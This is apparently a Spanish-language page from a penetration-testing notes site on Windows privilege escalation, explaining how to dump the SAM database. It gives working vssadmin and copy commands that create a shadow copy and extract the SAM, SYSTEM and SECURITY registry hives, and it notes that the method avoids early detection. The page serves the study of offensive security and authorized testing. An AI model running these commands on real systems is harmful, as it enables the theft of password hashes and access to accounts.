Dumpeo de la SAM

Windows Privilege Escalation

SAM significa Security Account Manager (Administrador de Cuentas de Seguridad), un archivo del sistema que almacena las contraseñas de las cuentas de usuario de forma cifrada y es fundamental para la autenticación local. Es una base de datos que contiene los hashes de las contraseñas de los usuarios locales del equipo y para verificar las credenciales del usuario cuando se inicia sesión, permitiendo el acceso a la máquina.

el archivo SAM se ubica dentro de la carpeta C:\windows\system32\config, siendo la ruta completa C:\windows\system32\config\SAM y esta cifrado.

Copiando SAM usando VSS (requiere administrador)

  • VSS o Volume Shadow Copy es Es un servicio de Windows que crea "instantáneas" (snapshots) de volúmenes mientras están en uso, Permite restaurar archivos a una versión anterior sin tener que detener las aplicaciones, facilitando la recuperación de datos perdidos o modificados accidentalmente. permitiendo acceder a archivos bloqueados.

vamos a empezar creando una instantánea del disco C:, lo que permite acceso a archivos del sistema que normalmente están bloqueados por medidas como lsass e incluso evitar detección temprana ya que no modifica el archivo original, solo lo lee sin interferir con el sistema

vssadmin create shadow /for=C:

el output esperado es parecido a:

Con exito se creó la copia de sombra: '{GUID-1234-...}'

ahora listamos las shadows copys actuales para posteriormente copiarlas:

vssadmin list shadows

el output esperado es como este (debes identificar tu copia hecha anteriormente):

Contenido de la copia de sombra: {GUID-1234...}
   Origen del volumen: C:\\
   Ruta de dispositivo de copia de sombra: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

cuando identifiques tu copia vas a copiar los siguientes archivos:

copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\temp\sam_backup
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM" C:\temp\system_backup
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY" C:\temp\security_backup

SAM dump (privilegios mínimos)

  • próximamente

PreviousEnumeración de credencialesNextDumpeo de SYSTEM

Last updated